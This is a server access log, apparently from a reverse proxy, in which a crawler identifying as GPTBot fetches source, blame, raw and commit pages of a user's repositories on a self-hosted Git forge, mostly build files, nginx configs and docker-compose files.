"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20388] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 8088] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 20387] [Gzip 16.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14307] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11215] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 11218] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:15:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin" [Client 74.7.227.38] [Length 48507] [Gzip 8.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:15:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:15:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:15:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" [Client 74.7.227.38] [Length 13519] [Gzip 5.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:15:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fdocker-compose.yml" [Client 74.7.227.38] [Length 26541] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2fbin%2fwatchfiles" [Client 74.7.227.38] [Length 24075] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:15:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fApp.tsx" [Client 74.7.227.38] [Length 24731] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/App.tsx" +[17/Feb/2026:15:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" +[17/Feb/2026:15:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10950] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/docker-compose.yml" +[17/Feb/2026:15:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12968] [Gzip 4.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" +[17/Feb/2026:15:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 13885] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" +[17/Feb/2026:15:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12752] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" +[17/Feb/2026:15:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12761] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host" +[17/Feb/2026:15:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12929] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj" +[17/Feb/2026:15:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11291] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/README.md" +[17/Feb/2026:15:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/components/About.tsx" +[17/Feb/2026:15:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 2813241] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:15:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" [Client 74.7.227.38] [Length 2813245] [Gzip 25.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/gold_monitor_full/base_library.zip" +[17/Feb/2026:15:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11309] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11313] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 12807] [Gzip 7.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 2430] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 12554] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 12571] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:15:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 15163] [Gzip 8.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:15:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 1445] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:15:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 1140] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:15:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 1143] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:15:22:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 1871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:15:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr 